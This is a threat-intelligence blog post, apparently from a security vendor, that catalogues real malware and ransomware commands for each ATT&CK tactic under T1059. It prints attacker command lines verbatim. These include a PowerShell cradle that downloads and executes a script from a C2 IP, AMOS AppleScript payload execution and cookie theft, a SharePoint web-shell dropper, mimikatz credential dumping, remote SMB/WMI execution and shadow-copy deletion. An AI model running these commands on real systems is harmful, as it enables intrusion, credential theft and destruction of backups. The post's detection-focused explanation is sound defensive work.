Procedure Examples of T1059 Command and Scripting Interpreter Across ATT&CK

Sıla Özeren Hacıoğlu | 13 MIN READ

LAST UPDATED ON MARCH 02, 2026

In the Red Report 2026, we shared our insights on the top ten most prevalent MITRE ATT&CK techniques employed by adversaries. Following the publication of The Red Report 2026, we have initiated a blog series to delve into each of these ATT&CK techniques in more detail. This year, from a dataset of 1.1 million observed malware samples, the Command and Scripting Interpreter technique stood out, accounting for 27% of cases. This translates to its presence in 294,498 malware samples, underlining its significant utilization by adversaries.

This blog post represents the first half of our series on the "Command and Scripting Interpreter" technique, where we dissect how adversaries leverage this method. To explore the sub-techniques associated with the T1059 Command and Scripting Interpreter technique, please click here for the related hub blog.

Initial Access

Initial access vectors typically leverage native scripting engines (PowerShell, VBScript, Bash, etc.) and command-line interfaces (CMD, Terminal) to:

Execute dropper scripts that fetch malware payloads from attacker-controlled command-and-control (C2) infrastructure
Bypass endpoint security through living-off-the-land binaries (LOLBins) and fileless execution
Establish persistence via scheduled tasks, registry modifications, or startup folder implants
Create reverse shells or C2 beacons for remote access

The initial compromise often exploits legitimate system interpreters to blend in with normal operations while downloading stage-2 payloads.

For example, in May 2025, DragonForce (and associated affiliates) used a PowerShell one-liner after gaining initial access to deliver a remote stager and execute an in-memory payload. One observed command was:

One specific command observed during these attacks was [1]:

powershell.exe -nop -w hidden -c "IEX ((New-Object Net.WebClient).DownloadString('hxxp://185[.]73[.]125[.]8:80/a67'))"

This command launches powershell.exe, uses -nop to skip profile loading and -w hidden to hide the window for stealth, then -c to run the following expression. The core expression IEX ((New-Object Net.WebClient).DownloadString('hxxp://<ip>:<port>/<file>')) instantiates a Net.WebClient, downloads a remote script as text from the supplied URL, and immediately executes it in memory via Invoke-Expression (IEX). That combination performs remote payload retrieval plus in-memory execution in one step, minimizing disk artifacts and making detection harder.

Such techniques highlight why teams must monitor and restrict scripting interpreters and command-line usage, enforce PowerShell constrained language/AMS I/ScriptBlock logging, and block or inspect suspicious outbound web requests to reduce risk.

Execution

Adversaries often exploit command and scripting techniques to perform input capture (ATT&CK T1056). To do so, they can utilize malware that uses built-in scripting environments, such as AppleScript on macOS, allowing attackers to bypass security controls and mimic legitimate user actions.

For example, in February 2025, attackers used a fake DeepSeek macOS installer to distribute Atomic macOS Stealer (AMOS), abusing AppleScript to stealthily copy and execute the payload. One observed command was:

osascript -e 'on run
try
set volumeList to list disks
repeat with vol in volumeList
if vol contains "DeepSeek" then
set setupVolume to vol
exit repeat
end if
end repeat
if setupVolume is "" then return
set path to "/Volumes/" & setupVolume & "/.DeepSeek"
set tmpPath to "/tmp/.DeepSeek"
do shell script "rm -f " & quoted form of tmpPath
do shell script "cp " & quoted form of path & " " & quoted form of tmpPath
do shell script "xattr -c " & quoted form of tmpPath
do shell script "chmod +x " & quoted form of tmpPath
do shell script quoted form of tmpPath
end try
end run'

This script searches for the mounted installer volume, copies the hidden .DeepSeek binary to /tmp/, clears extended attributes (bypassing Gatekeeper), makes it executable, and runs it, entirely via AppleScript. By embedding this in osascript, the malware bypasses standard macOS app execution checks, relying instead on user interaction and automation abuse for execution.

Persistence

Command and scripting interpreters are critical tools for adversaries to execute and automate persistence mechanisms, allowing them to maintain continuous access to compromised environments. These interpreters enable attackers to issue commands or run scripts that can modify system configurations, deploy malicious payloads, and automate tasks that ensure their presence remains undetected over time.

In February 2025, Picus Security analyzed CABINETRAT, a Windows malware used in targeted attacks across South Asia. To maintain persistence, it created a scheduled task that re-executed its payload every 12 hours [2]:

schtasks.exe /create /sc hourly /mo 12 /tn "arbitrary-task-name" /tr "%LOCALAPPDATA%\Microsoft\Office\malicious-binary.exe" /f /RL LIMITED /IT

This command creates a scheduled task that executes every 12 hours. It runs a malicious payload placed under a directory that mimics a legitimate Microsoft Office path, increasing the chances of evading visual inspection and traditional security tools.

The /RL LIMITED flag ensures the task runs with standard user privileges, reducing the need for elevation and lowering its detection profile. Leveraging schtasks.exe in this way is a common persistence tactic: it blends seamlessly into legitimate system activity, survives system reboots, and doesn't rely on registry autoruns or advanced evasion techniques.

Privilege Escalation

Adversaries frequently leverage command-line tools and scripting to escalate their privileges, enabling them to bypass access controls and gain higher levels of control over compromised systems. This approach is highly effective as it exploits legitimate system functionality, often evading detection.

In their January‑2025 tracking of the threat cluster called Mocha Manakin, researchers observed a "paste‑and‑run" PowerShell command that downloaded additional malware, including a Node.js backdoor named NodeInitRAT.

After delivering the NodeInitRAT payload, Mocha Manakin establishes persistence using the Windows Registry Run key mechanism via cmd.exe [3]. The exact command is:

reg add
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdater" /t REG_SZ /d "C:\users[redacted]\AppData\Roaming
\node-v22.11.0-win-x64\node.exe C:\users[redacted]\AppData\Roaming\
node-v22.11.0-win-x64\2fbjs1z6.log" /f"

This command creates a registry entry that ensures the NodeInitRAT payload runs every time the user logs in. To avoid suspicion, the malware is tucked away in a directory that mimics Microsoft Office and given a misleading name like "ChromeUpdater". The payload is executed through node.exe, a legitimate Node.js binary, which runs a hidden script file with a .log extension.

Defense Evasion

Adversaries prioritize defense evasion to bypass or disable security mechanisms, enabling their attacks to proceed undetected. This tactic often involves exploiting built-in tools and obfuscation techniques to avoid triggering traditional defenses.

For example, from a September 2025 research tone on ToolShell malware, aPowerShell process spawned by IIS worker on the compromised Windows SharePoint server [4]:

powershell -EncodedCommand JABiAGEAcwBlADYMABTAHQAcgB.[...redacted....]

Upon decoding, the payload reveals itself by unpacking a Base64-encoded layer, and ultimately dropping its contents into another file (spinstall0.aspx).

$base64String = "PCVAIDEgTGFuZ3VhZ2U9IkMjIiBWYWxpZG...redacted...OyAlPg0K"
$destinationFile = "C:\PROGRA~1\COMMON~1\MICROS~1\WEBSER~1\16\TEMPLATE\LAYOUTS\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop

When decoded, it translates to:

<%@ Page Language="C#" ValidateRequest="false" %><%@ Import Namespace="System.Diagnostics" %><% System.Diagnostics.Process.Start("cmd.exe", "/c taskkill /F /IM w3wp.exe & timeout /t 2 & move \"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\_SpinInstall.aspx\" \"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\SpinInstall.aspx\" & copy \"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\_SpinInstall.aspx\" \"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx\" /Y & iisreset /restart"); %>

This script is a common pattern seen in post-exploitation and web shell activity. It allows an attacker who has already gained code execution on the server to:

Maintain Persistence: By modifying or replacing core installation/setup files (spinstall0.aspx and SpinInstall.aspx), the malicious code ensures it will be executed or available for the attacker upon subsequent server operations or updates.
Modify the Server State: It stops and restarts critical services, often to load new malicious modules or complete file-level changes without interruption.
Target SharePoint: The specific file paths confirm that the target environment is a SharePoint farm.

It is a technique for tampering with the server's legitimate installation and configuration files.

Credential Access

Adversaries frequently exploit command-line tools and scripting interpreters to gain unauthorized access to credentials, leveraging their flexibility and integration with system utilities. These methods allow attackers to interact with sensitive system components, such as Active Directory, to extract valuable data like user credentials and password hashes.

Picus's August 2025 research on the Mustang Panda cluster documented the actor dumping LSASS memory to harvest authentication artifacts for lateral movement and privilege escalation [5].

Observed command:

%TMP%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords" exit

What each part does

privilege::debug grants the process the debug privilege required to read protected process memory (LSASS runs with SYSTEM-level rights).
sekurlsa::logonPasswords parses LSASS memory and extracts authentication artifacts such as NTLM hashes, Kerberos tickets (TGT/TGS) and, where available, plaintext or cached credentials.
exit cleanly terminates the tool.

The artifacts are immediately reusable, NTLM hashes for pass-the-hash, Kerberos tickets for pass-the-ticket/lateral access, and plaintext credentials for direct logins, enabling privilege escalation and lateral movement.

Discovery

Adversaries often exploit command-line tools to gather information and establish control over compromised environments, leveraging their simplicity and integration with system functionality.

For a concrete example, an October 2025 analysis of Interlock ransomware recorded a handful of simple, built-in commands the actor used during host discovery [6]:

# gathers OS version and system details
systeminfo
# enumerates privileged accounts in the Domain Admins group
net group "domain admins"
# lists active user sessions
quser
# queries the service state of Microsoft Defender ATP sensor.
sc query sense
# enumerates available file shares and drives.
Get-PSDrive (in PowerShell)

Run in sequence, these one-liners give an attacker a quick inventory of the host and its security posture, who's logged in, where sensitive accounts live, whether endpoint protections are active, and what storage is available, which directly informs credential harvesting, privilege escalation, and lateral movement.

Lateral Movement

Adversaries often leverage PowerShell for lateral movement, using its robust remote execution capabilities to expand their reach within compromised networks.

In September 2025, an analysis of a MuddyWater intrusion showed the actor using SMB-based remote execution and WMI to run commands on remote hosts, enabling hands-off lateral spread [7].

# Execute a PowerShell SMB exec routine that runs a payload on a remote host
Invoke-SMBExec -Target <RemoteHost> -Domain <Domain> -Username <User> -Hash <NTLM-Hash> -Command "powershell.exe -ExecutionPolicy Bypass -File <Payload.ps1>"

# Use WMI to create a remote process that launches a payload
wmic /node:<TargetHost> process call create "cmd.exe /c powershell -ExecutionPolicy Bypass -File <Payload.ps1>"

What each part does

Invoke-SMBExec runs a command on a remote host over SMB using supplied credentials (or an NTLM hash); -Command specifies what executes on the target.
wmic … process call create instructs a remote system via WMI to start a local process; the quoted string is the command the host will run.

Both techniques execute code remotely using built-in Windows channels and interpreters, letting attackers move laterally without dropping custom remote-execution binaries and making their activity blend with normal admin traffic.

Collection

Collection is a core tactic for info-stealers. In Picus's April 2025 analysis, Atomic Stealer (AMOS) is shown to leverage AppleScript and scripted file-copy routines to systematically harvest credentials, browser cookies, Notes data, and user documents from compromised macOS hosts [8].

The following AppleScript commands implement AMOS's collection logic.

-- Steals Safari cookies
duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing

-- Steals Notes database
duplicate file "NoteStore.sqlite" of folder notesFolder to folder baseFolderPath with replacing
duplicate file "NoteStore.sqlite-shm" of folder notesFolder to folder baseFolderPath with replacing
duplicate file "NoteStore.sqlite-wal" of folder notesFolder to folder baseFolderPath with replacing

-- Collects user documents
repeat with aFile in (desktopFiles & documentsFiles)
if fileExtension is in extensionsList and fileSize ≤ 51200 then
duplicate aFile to folder fileGrabberFolderPath with replacing
end if
end repeat

What each part does

Cookies: Copies Cookies.binarycookies to capture session tokens and login states.
Notes: Duplicates NoteStore.sqlite and its associated files to extract saved notes and any embedded sensitive content.
Documents: Iterates Desktop and Documents, selecting files that match certain extensions and size limits, and stages them for exfiltration.

Once complete, the stolen files are compressed and sent over HTTP POST to the attacker's command-and-control (C2) server. Together, these routines allow Atomic Stealer to systematically harvest cookies, credentials, and personal documents, enabling further credential theft and identity compromise.

Command and Control

Adversaries often utilize command and scripting interpreters to establish C2 channels, enabling them to execute commands and maintain control over compromised systems.

In an August 2025 analysis of Koske malware campaigns, Picus Security observed operators enumerate user and system shell configuration files (for example ~/.bashrc, ~/.bash_profile, and /etc/environment) to discover proxy settings they could later abuse for covert traffic redirection or internal C2 routing [9].

The behavior is consistent with reconnaissance aimed at identifying existing proxy variables and hop points that make C2 traffic blend with legitimate network flows.

echo ".bashrc: "; cat ~/.bashrc | grep proxy; \
echo "etc/environment: "; cat /etc/environment | grep proxy; \
echo ".bash_profile: "; cat ~/.bash_profile | grep proxy
#Reads common configuration files (~/.bashrc, /etc/environment, and ~/.bash_profile) and searches for entries containing "proxy." This simulates adversary behavior of enumerating proxy variables that could later be abused for internal C2 routing.

Payloads reads common shell/environment configuration files and searches for occurrences of the string proxy, a quick method to identify configured proxy variables or hostnames that an adversary might repurpose to redirect or tunnel traffic.

Impact

Adversaries frequently leverage command-line tools and scripting to target backup mechanisms, obstructing victims' ability to recover data after an attack.

For example, Picus's February 2025 analysis of RansomHub shows operators removing Volume Shadow Copy Service (VSS) snapshots with simple, scripted commands that rapidly destroy local restore points and frustrate recovery efforts [10].

# starts the Volume Shadow Copy Service so VSS operations can run.
net start vss
# sets the VSS service start type to Manual, preventing it from auto-starting on reboot
wmic service where name='vss' call ChangeStartMode Manual
# deletes all VSS snapshots silently, removing local restore points.
vssadmin.exe Delete Shadows /all /quiet
# stops the VSS service immediately to prevent new snapshots from being created.
net stop vss
# disables VSS permanently (until re-enabled), blocking future snapshot creation.
wmic service where name='vss' call ChangeStartMode Disabled

Together these commands remove existing VSS backups and then prevent the service from recreating them, significantly reducing the victim's ability to restore files after ransomware or other destructive activity.

Validate Your Defenses Against the Red Report 2026 Threats

References

[1] S. Ö. Hacıoğlu, “Retail Under Fire: Inside the DragonForce Ransomware Attacks on Industry Giants,” May 02, 2025. Available: https://www.picussecurity.com/resource/blog/dragonforce-ransomware-attacks-retail-giants. [Accessed: Nov. 03, 2025]

[2] S. Ö. Hacıoğlu, “CABINETRAT Malware Windows Targeted Campaign Explained,” Oct. 19, 2025. Available: https://www.picussecurity.com/resource/blog/cabinetrat-malware-windows-targeted-campaign-explained. [Accessed: Nov. 03, 2025]

[3] R. C. Intelligence, “Mocha Manakin delivers custom NodeJS backdoor via paste and run,” Red Canary, Jun. 18, 2025. Available: https://redcanary.com/blog/threat-intelligence/mocha-manakin-nodejs-backdoor/. [Accessed: Nov. 03, 2025]

[4] Available: https://www.trellix.com/blogs/research/toolshell-unleashed-decoding-the-sharepoint-attack-chain/. [Accessed: Nov. 03, 2025]

[5] S. Ö. Hacıoğlu, “Breaking Down Mustang Panda’s Windows Endpoint Campaign,” Aug. 26, 2025. Available: https://www.picussecurity.com/resource/blog/breaking-down-mustang-panda-windows-endpoint-campaign. [Accessed: Nov. 04, 2025]

[6] S. Molige, “A Year Later, Interlock Ransomware Keeps Leveling Up,” Forescout, Oct. 16, 2025. Available: https://www.forescout.com/blog/a-year-later-interlock-ransomware-keeps-leveling-up/. [Accessed: Nov. 04, 2025]

[7] “Inside a MuddyWater Intrusion: Exploitation of SharePoint and Living-Off-the-Land Tactics - Kudelski Security Research Center.” Available: https://kudelskisecurity.com/research/inside-a-muddywater-intrusion-exploitation-of-sharepoint-and-living-off-the-land-tactics. [Accessed: Nov. 04, 2025]

[8] S. Ö. Hacıoğlu, “Atomic Stealer: Dissecting 2024’s Most Notorious macOS Infostealer,” Apr. 10, 2025. Available: https://www.picussecurity.com/resource/blog/atomic-stealer-amos-macos-threat-analysis. [Accessed: Nov. 04, 2025]

[9] S. Ö. Hacıoğlu, “Explaining the AI-Assisted Koske Linux Cryptomining Malware Hidden in JPEGs,” Aug. 29, 2025. Available: https://www.picussecurity.com/resource/blog/explaining-the-ai-assisted-koske-linux-cryptomining-malware-hidden-in-jpegs. [Accessed: Nov. 04, 2025]

[10] S. Ö. Hacıoğlu, “RansomHub: Analyzing the TTPs of One of the Most Notorious Ransomware Variants of 2024,” Feb. 18, 2025. Available: https://www.picussecurity.com/resource/blog/ransomhub. [Accessed: Nov. 04, 2025]